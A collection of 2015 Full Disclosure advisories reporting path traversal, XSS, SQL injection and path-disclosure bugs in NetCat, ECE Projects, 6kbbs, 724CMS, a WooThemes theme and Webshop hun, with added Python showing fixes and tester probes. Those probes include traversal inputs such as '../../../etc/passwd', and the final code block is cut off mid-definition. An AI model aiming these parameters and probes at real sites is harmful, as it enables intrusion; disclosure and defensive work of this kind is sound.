Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: April 14, 2015
Latest Update: April 14, 2015
Vulnerability Type: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal') [CWE-22]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Discoverer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]






*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Vulnerable Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be obtained from here,
http://netcat.ru/


*Product Introduction Overview:*
NetCat.ru is a Russian local company. NetCat is designed to create the
absolute majority of the types of sites: from a simple business card with
minimal content to complex web-based systems, from corporate offices to
online stores, libraries or media data - in other words, projects in
completely different directions and at any level of complexity. Examples of
sites running on NetCat CMS can be viewed in a special section.

Even an inexperienced user can manage a site based on NetCat, because it
does not require knowledge of Internet technologies, programming and markup
languages. NetCat is constantly improving and adds new features. In the
process of finalizing it, the wishes of our partners and clients, as well
as trends in Internet development, are necessarily taken into account. More
than 2,000 studios and private web developers have chosen NetCat for their
projects, and by 2013 more than 18,000 sites had been created that run
successfully on our CMS.




*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
Directory Traversal - Local File Include (LFI) attacks. A local file
inclusion (LFI) flaw is due to the script not properly sanitizing user
input, specifically path traversal style attacks (e.g. '../../') supplied
to the parameters. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote host. This
may allow disclosing file contents or executing files like PHP scripts.
Such attacks are limited due to the script only calling files already on
the target host.

Several other NetCat products' 0-day vulnerabilities have been found by some
other bug hunter researchers before. NetCat has patched some of them. Gmane
(pronounced mane) is an e-mail to news gateway. It allows users to access
electronic mailing lists as if they were Usenet newsgroups, and also
through a variety of web interfaces. Gmane is an archive; it never expires
messages (unless explicitly requested by users). Gmane also supports
importing list postings made prior to a list's inclusion on the service. It
has published suggestions, advisories and solutions related to Directory
Traversal vulnerabilities.



*(2.1)* The first programming code flaw occurs at the /netcat/index.php? page
with the INCLUDE_FOLDER parameter.

*(2.2)* The second programming code flaw occurs at the /eshop/index.php? page
with the INCLUDE_FOLDER parameter.

*(2.3)* The third programming code flaw occurs at the /add.php? page with
the INCLUDE_FOLDER parameter.





*References:*
http://www.tetraph.com/security/directory-traversal-vulnerability/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-multiple-directory.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://www.iedb.ir/author-Wang%20Jing.html
http://exploitarchive.com/724cms-5-01-4-59-4-01-3-01-directory-traversal/
http://lists.openwall.net/full-disclosure/2015/03/05/5
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1666



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

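Added example, not NetCat's code: how an INCLUDE_FOLDER-style value can be canonicalised and confined to a base directory, the fix class for the traversal described in (2) above. The base directory path is an assumption; the logic uses pure posixpath operations so that it behaves the same on any host.

```python
import posixpath
from urllib.parse import unquote

# Assumption: the only directory the application may include code from.
INCLUDE_ROOT = "/srv/netcat/include"


def resolve_include(param, root=INCLUDE_ROOT):
    """Map a user-supplied folder value to a canonical path inside root.

    Returns the absolute path, or None when the value is empty, carries a
    null byte or backslash, is absolute, or escapes root after
    normalisation. On a live system, additionally run os.path.realpath on
    the result and repeat the containment test, so symlinks inside root
    cannot point outside it.
    """
    value = unquote(param or "")          # catch %2e%2e%2f style encoding
    if not value or "\x00" in value or "\\" in value:
        return None
    if value.startswith("/"):
        return None                       # absolute paths never qualify
    candidate = posixpath.normpath(posixpath.join(root, value))
    # Containment on path components, not on a string prefix: a prefix test
    # would accept "/srv/netcat/include2/x" for root "/srv/netcat/include".
    if posixpath.commonpath([root, candidate]) != root:
        return None
    if candidate == root:
        return None                       # must name a folder below root
    return candidate


if __name__ == "__main__":
    for sample in ("modules/eshop", "../../../etc/passwd",
                   "..%2F..%2F..%2Fetc%2Fpasswd", "/etc/passwd",
                   "../include2/x"):
        print(f"{sample!r:32} -> {resolve_include(sample)!r}")
```

Where the set of includable folders is small and known (as it is for a CMS module directory), an allow-list of folder names is stronger still and removes the need to reason about normalisation at all; the canonicalise-then-contain check above is the general form for when the set is open-ended.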


[FD] ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities

2015-04-05 Thread Jing Wang
*ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: ECE Projects XSS (Cross-site Scripting) Security
Vulnerabilities
Vendor: ECE Projektmanagement G.m.b.H. & Co. KG (ECE)
Product: ECE Projects
Vulnerable Versions:
Tested Version:
Advisory Publication: April 01, 2015
Latest Update: April 01, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]




*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
ECE Projektmanagement G.m.b.H. & Co. KG (ECE)


*Product & Version:*
All Projects - Shopping & Office, Traffic, Industries, Hotel, Residential


*Vendor URL & download:*
ECE Projects can be obtained from here,
http://www.ece.com/en/projects/all-projects/


*Google Dork:*
ECE Projektmanagement GmbH & Co. KG


*Product Introduction Overview:*
ECE develops, builds, and manages large commercial properties in the
business areas Shopping, Office, Traffic, and Industries. It was founded in
1965 by mail-order pioneer Prof. Werner Otto (1909-2011) and is owned by
the Otto family. Since 2000, the company founder's son, Alexander Otto, has
been heading the company. Hamburg-based ECE has been developing, building,
leasing out, and managing large commercial properties in the business areas
Shopping, Office, Traffic, and Industries and is European market leader in
the field of downtown shopping centers. For decades, ECE has been realizing
very successfully large group headquarters, office buildings, industrial
buildings, logistic centers, traffic-related properties, hotels and other
highly complex building types. ECE provides all real estate-related
services from one source and thus creates a major benefit for their
customers, clients and partners by pooling their complete know-how. With
regard to numerous projects the ECE group acts as investor and keeps the
projects in the portfolio for decades. Furthermore, two ECE funds
concentrate on the acquisition of shopping centers with value growth
potential. ECE is Europe-wide successfully positioned with numerous
subsidiaries and joint ventures.

ECE employs specialists with in-depth knowledge of the retail trade and
all related disciplines and pools this wide-ranging expertise under one
roof. Our full-service concept extends from the original idea right through
to long-term management. Our credo: a full range of services from a single
provider who takes overall responsibility as opposed to a coordinator.
This expertise is underpinned by several decades of experience in the
sector as well as the financial strength of the ECE Group and enables us to
cater to the full range of needs and requirements of our clients.



*(2) Vulnerability Details:*
The ECE web application has a security bug. It can be exploited by XSS
attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several 0-day vulnerabilities in ECE Projects products have been found by
other bug-hunting researchers before. ECE Projects patched some of them.
The Open Sourced Vulnerability Database (OSVDB) is an independent and
open-sourced database. The goal of the project is to provide accurate,
detailed, current, and unbiased technical information on security
vulnerabilities. The project promotes greater, open collaboration between
companies and individuals. It has published suggestions, advisories and
solution details related to XSS vulnerabilities.


*(2.1)* The first code programming flaw occurs at the suchergebnis/? page
with the tx_solr[q] parameter.






*References:*
http://www.tetraph.com/security/xss-vulnerability/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/ece-projects-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
http://packetstormsecurity.com/files/authors/11717
http://www.osvdb.org/show/osvdb/119707




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: 
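Added example, not part of the advisory and not ECE's code: the reflected-XSS pattern the post reports for the tx_solr[q] parameter, shown as a minimal search-results renderer beside its hardened form, together with the reflection check a tester runs to confirm such a finding. The parameter name is the one from the advisory; the page layout, the canary string and the function names are assumptions made for this demonstration.

```python
import html
import re
from urllib.parse import parse_qs, urlencode

PARAM = "tx_solr[q]"          # parameter named in the advisory
CANARY = 'xss<"\'>tst'        # constructed probe: one breakout character per HTML context


def _query_value(query_string: str) -> str:
    """Pull the search term out of the query string the way the page would."""
    return parse_qs(query_string).get(PARAM, [""])[0]


def render_search_vulnerable(query_string: str) -> str:
    """Assumed page layout (not ECE's template): the term is echoed unencoded
    into an attribute value and into a text node. This is the bug class."""
    q = _query_value(query_string)
    return '<input name="%s" value="%s">\n<h2>Results for %s</h2>' % (PARAM, q, q)


def render_search_fixed(query_string: str) -> str:
    """Same layout with output encoding. quote=True also turns ' and " into
    entities, so the attribute context is covered as well as the text node."""
    q = html.escape(_query_value(query_string), quote=True)
    return '<input name="%s" value="%s">\n<h2>Results for %s</h2>' % (PARAM, q, q)


def probe_query() -> str:
    """The query string a tester sends: the canary, URL-encoded so that the
    server decodes it back to the raw characters."""
    return urlencode({PARAM: CANARY})


def unencoded_reflections(body: str, canary: str = CANARY) -> int:
    """How many times the canary came back with its special characters intact.
    Any count above zero means script can be injected at that spot."""
    return len(re.findall(re.escape(canary), body))


def is_reflected_xss(render) -> bool:
    """End-to-end check against a page-rendering function."""
    return unencoded_reflections(render(probe_query())) > 0
```

Against a live target the same check is the request with probe_query() appended and unencoded_reflections() run over the response body; each hit is then confirmed by hand in the context it landed in (attribute, text node, script), because the encoding that fixes it differs per context.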

[FD] 6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities

2015-04-05 Thread Jing Wang
*6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: 6kbbs XSS (Cross-site Scripting) Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1 & v8.0
Tested Version: v7.1 & v8.0
Advisory Publication: April 02, 2015
Latest Update: April 02, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html
http://code.google.com/p/6kbbs/downloads/list



*Product Introduction Overview:*
6kbbs V8.0 is a high-performance forum built with PHP + MySQL; its code is
simple, easy to use, powerful and fast. It is an excellent community forum
program. The program is simple but not simplistic: fast and small, with a
generous interface and good scalability, functional and practical, pursuing
superior performance, a good interface and the utility functions users
prefer.

1. Uses an XHTML + CSS architecture, so that the page structure saves
   static page code in transmission and the interface is easy to modify,
   more in line with web standards.
2. The forum uses Cookies, Session, Application and other technologies to
   cache forum data, reducing database access and improving forum
   performance, so it can carry more simultaneous users.
3. Data table partitioning reduces the burden of large data volumes when
   accessing the database.
4. Support for switching between multiple skin styles.
5. Uses RSS to support subscriptions to forum posts, recent posts and a
   user's posts.
6. Display in frame mode + tablet mode; the user can choose according to
   their own preference.
7. Forum page keyword optimization, so the forum is more easily indexed by
   search engines.
8. Extensions, giving our friends broad room to expand the forum's
   services.
9. Webmasters can add different ads at the top and bottom, depending on the
   layout.
10. Posts use two editors, HTML and UBB, which convert to each other and
    are compatible with each other; ...




*(2) Vulnerability Details:*
The 6kbbs web application has a security bug. It can be exploited by
XSS attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several 0-day vulnerabilities in 6kbbs products have been found by other
bug-hunting researchers before. 6kbbs has patched some of them. The
milw00rm.com site is an archive of exploits, videos, papers and
vulnerabilities. It has published suggestions, advisories and solution
details related to 6kbbs vulnerabilities.


*(2.1)* The first code programming flaw occurs at the /userlist.php? page
with the orderby parameter.





*References:*
http://www.tetraph.com/security/xss-vulnerability/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.sg/2015/04/6kbbs-v80-xss-cross-site-scripting.html?view=sidebar
http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://marc.info/?a=139222176300014&r=1&w=4
http://packetstormsecurity.com/files/authors/11717
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01759.html
http://milw00rm.com/exploits/6673




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

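Added example, not 6kbbs code: the safe handling of a sort parameter such as userlist.php?orderby=... A sort key is an enumerated value, so the fix is to map the request value onto a fixed set of column names and to encode whatever is written back into the page, instead of echoing the raw value. The parameter name comes from the advisory; the column names, the page fragment and the function names are assumptions.

```python
import html
from urllib.parse import parse_qs, urlencode

# Public sort keys -> real column names (assumed columns). The request value
# is only ever used as a lookup key into this table.
ALLOWED_ORDER = {"username": "username", "posts": "post_count", "regdate": "registered_at"}
DEFAULT_ORDER = "username"


def _raw_orderby(query_string: str) -> str:
    return parse_qs(query_string, keep_blank_values=True).get("orderby", [""])[0]


def pick_orderby(query_string: str) -> str:
    """Canonical sort key. Anything not in the allow-list, including the
    internal column names themselves, falls back to the default."""
    raw = _raw_orderby(query_string)
    return raw if raw in ALLOWED_ORDER else DEFAULT_ORDER


def order_by_sql(key: str) -> str:
    """ORDER BY clause built from the allow-list, so the request value never
    reaches the SQL text (a concatenated sort value is also ORDER BY injection)."""
    return "ORDER BY " + ALLOWED_ORDER[key]


def render_sort_links_vulnerable(query_string: str) -> str:
    """Assumed vulnerable pattern: the raw value is written back into an href
    and a class attribute to mark the current sort."""
    raw = _raw_orderby(query_string)
    return '<a href="userlist.php?orderby=%s&page=2" class="sort-%s">next</a>' % (raw, raw)


def render_sort_links_fixed(query_string: str) -> str:
    """Only the canonical key is written back: URL-encoded inside the query
    string, then HTML-encoded inside the attributes."""
    key = pick_orderby(query_string)
    href = "userlist.php?" + urlencode({"orderby": key, "page": 2})
    return '<a href="%s" class="sort-%s">next</a>' % (
        html.escape(href, quote=True), html.escape(key, quote=True))
```

The allow-list does double duty: it removes the reflected value from the page, and it keeps the same parameter out of the ORDER BY clause, which is where a sort parameter usually ends up in the query.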


[FD] 724CMS 5.01 Multiple Information Leakage Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Multiple Information Leakage Security Vulnerabilities*



Exploit Title: 724CMS Multiple Information Leakage Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01 & 4.01 & 4.59 & 5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise


*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01


*Vendor URL & download:*
724CMS can be obtained from here,
http://724cms.com/


*Product Introduction Overview:*
724CMS is a content management system (CMS) that has large customers spread
across Canada, Japan, Korea, the United States and many other countries. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment.







*(2) Vulnerability Details:*
The 724CMS web application has a security bug. It can be exploited by
information leakage attacks - Full Path Disclosure (FPD). This may allow a
remote attacker to disclose the software's installation path. While such
information is relatively low risk, it is often useful in carrying out
additional, more focused attacks.

Several vulnerabilities in 724CMS products have been found by other
bug-hunting researchers before. 724CMS has patched some of them. NVD is the
U.S. government repository of standards-based vulnerability management data
(this data enables automation of vulnerability management, security
measurement, and compliance (e.g. FISMA)). It has published suggestions,
advisories and solutions related to 724CMS vulnerabilities.


*(2.1)* The first code programming flaw occurs at the index.php page with
the Lang and ID parameters.

*(2.2)* The second code programming flaw occurs at the section.php page
with the Lang and ID parameters.








*References:*
http://tetraph.com/security/information-leakage-vulnerability/724cms-5-01-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-information-leakage-security.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-information-leakage-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-information-leakage-security-vulnerabilities/
https://infoswift.wordpress.com/2015/03/14/724cms-5-01-information-leakage-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142576280203098&w=4
http://en.hackdig.com/wap/?id=17055






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious



[FD] 724CMS 5.01 Multiple SQL Injection Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Multiple SQL Injection Security Vulnerabilities*


Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01





*Vendor URL & download:*
724CMS can be obtained from here,
http://724cms.com/



*Product Introduction Overview:*
724CMS is a content management system (CMS) that has customers spread across
Canada, Japan, Korea, the United States, Europe and many other countries. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment.

A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows.






*(2) Vulnerability Details:*
The 724CMS web application has a security bug. It can be exploited by
SQL Injection attacks. This may allow an attacker to inject or manipulate
SQL queries in the back-end database, allowing for the manipulation or
disclosure of arbitrary data.

Several vulnerabilities in 724CMS products have been found by other
bug-hunting researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has phase, votes, comments and
proposed details related to 724CMS vulnerabilities.


*(2.1)* The first code programming flaw occurs at the /index.php page with
the Lang and ID parameters.

*(2.2)* The second code programming flaw occurs at the /section.php page
with the Lang and ID parameters.








*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html
http://marc.info/?a=139222176300014&r=1&w=4
http://en.1337day.com/exploit/23308






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious



[FD] WordPress Daily Edition Theme v1.6.2 Information Leakage Security Vulnerabilities

2015-03-10 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 Information Leakage Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme /thumb.php src Parameter
Information Leakage Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* & v1.5.* & v1.4.* & v1.3.* & v1.2.* & v1.1.* &
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
WooThemes



*Product & Vulnerable Versions:*
WordPress Daily Edition Theme
version 1.6.7
version 1.6.6
version 1.6.5
version 1.6.4
version 1.6.3
version 1.6.2
version 1.6.1
version 1.6
version 1.5
version 1.4.11
version 1.4.10
version 1.4.9
version 1.4.8
version 1.4.7
version 1.4.6
version 1.4.5
version 1.4.4
version 1.4.3
version 1.4.2
version 1.4.1
version 1.4.0
version 1.3.2
version 1.3.1
version 1.3
version 1.2.1
version 1.2
version 1.1.2
version 1.1.1
version 1.1
version 1.0.12
version 1.0.11
version 1.0.10
version 1.0.9
version 1.0.8
version 1.0.7
version 1.0.6
version 1.0.5
version 1.0.4
version 1.0.3
version 1.0.2
version 1.0.1
version 1.0



*Vendor URL & buy:*
WordPress Daily Edition Theme can be obtained from here,
http://www.woothemes.com/products/daily-edition/
http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt



*Product Introduction:*
The Daily Edition WordPress theme was developed by the WooThemes team. Daily
Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay.
With loads of home page modules to enable/disable and a unique
JavaScript-based featured scroller and video player, the theme oozes
sophistication.

The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the theme's
appearance and functions flexible. From the Daily Edition's 3 option pages
you can, for example, add your Twitter and Google Analytics code, some
custom CSS and footer content – and in the widgets area you find a practical
ads management.

Unique Features
These are some of the more unique features that you will find within the
theme:
- A neat JavaScript home page featured slider, with thumbnail previews of
  previous/next slides on hover over the dots.
- A “talking points” home page that can display posts according to tags,
  in order of most commented to least commented. A great way to highlight
  posts gathering dust in the archives.
- A customizable home page layout with options to specify how many full
  width blog posts and how many “box” posts you would like to display.
- A JavaScript home page video player with thumbnail hover effect.
- 16 delicious colour schemes to choose from!







*(2) Vulnerability Details:*
The WordPress Daily Edition Theme has a web application security bug.
It can be exploited by information leakage attacks - Full Path Disclosure
(FPD). This may allow a remote attacker to disclose the software's
installation path. While such information is relatively low risk, it is
often useful in carrying out additional, more focused attacks.


*(2.1)* The code flaw occurs at the thumb.php? page with the src parameter.







*References:*
http://tetraph.com/security/information-leakage-vulnerability/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162_10.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
https://cxsecurity.com/issue/WLB-2015020093






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious


[FD] Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD) Security Vulnerabilities

2015-03-07 Thread Jing Wang
*Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD)
Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php termid parameter Information
Leakage Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: March 07, 2015
Latest Update: March 07, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Webshop hun


*Product & Version:*
Webshop hun
v1.062S


*Vendor URL & Download:*
Webshop hun can be bought from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product-selling web application system.

If you want to distribute your products through a webshop, but the
solutions found on the internet are too expensive, choose the Webshop Hun
shop program and get a web store for free; in return, the maker's banner
(468x60) must be displayed at the bottom of the page. The downloadable shop
program has no limit on the number of products nor any quantitative
restrictions, and it can be used immediately after installation, for which
we provide a video to assist.

The Hun Shop store is free for all. In our experience, it is among the most
dynamic web solutions from our country. If the Webshop Hun's own look does
not suit you, you can also customize the look by replacing some of the
images and the corresponding text, or for an extra charge we can realize
your ideas. The Webshop Hun pages are search engine optimized. The Hun Shop
web program was made to meet the efficiency guidelines of the search
engines. The pages are easy to read and contain no unnecessary HTML tags.
Any web page is simply a few clicks away.





*(2) Vulnerability Details:*
The Webshop hun web application has a security bug. It can be exploited
by Information Leakage attacks. This may allow a remote attacker to
disclose the software's installation path. While such information is
relatively low risk, it is often useful in carrying out additional, more
focused attacks.



*(2.1)* The code flaw occurs at the index.php? page with the termid
parameter. Attackers can get information such as the server software
installation path, etc.






*References:*
http://tetraph.com/security/information-leakage-vulnerability/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-information-leakage.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/webshop-hun-v1-062s-information-leakage-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/26
http://packetstormsecurity.com/files/130648/Webshop-Hun-1.062S-Cross-Site-Scripting.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

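Added example, not code from 724CMS, WooThemes or Webshop hun: a check that confirms the Full Path Disclosure findings reported above for 724CMS (index.php and section.php, Lang and ID parameters), the Daily Edition theme (thumb.php, src) and Webshop hun (index.php, termid) by pulling the disclosed path out of the PHP error text in a response, plus the parameter mutations that commonly provoke such an error. The sample response is constructed; the advisories do not say which request shape triggered the disclosure in each product, so the probe list is a general assumption, as are the function names.

```python
import re
from typing import List, Tuple

# Constructed sample: the kind of page body an FPD probe produces when PHP's
# display_errors is on. PHP prints the absolute script path inline.
SAMPLE_BODY = (
    "<br />\n<b>Warning</b>:  mysql_fetch_array() expects parameter 1 to be "
    "resource, boolean given in <b>/var/www/html/724cms/section.php</b> on line "
    "<b>42</b><br />\n"
    "<br />\n<b>Notice</b>:  Undefined index: Lang in "
    "<b>C:\\inetpub\\wwwroot\\724cms\\index.php</b> on line <b>17</b><br />\n"
    "<html><body>...</body></html>"
)

_TAGS = re.compile(r"<[^>]+>")
# Severity, message, absolute path (Unix or Windows drive form), line number.
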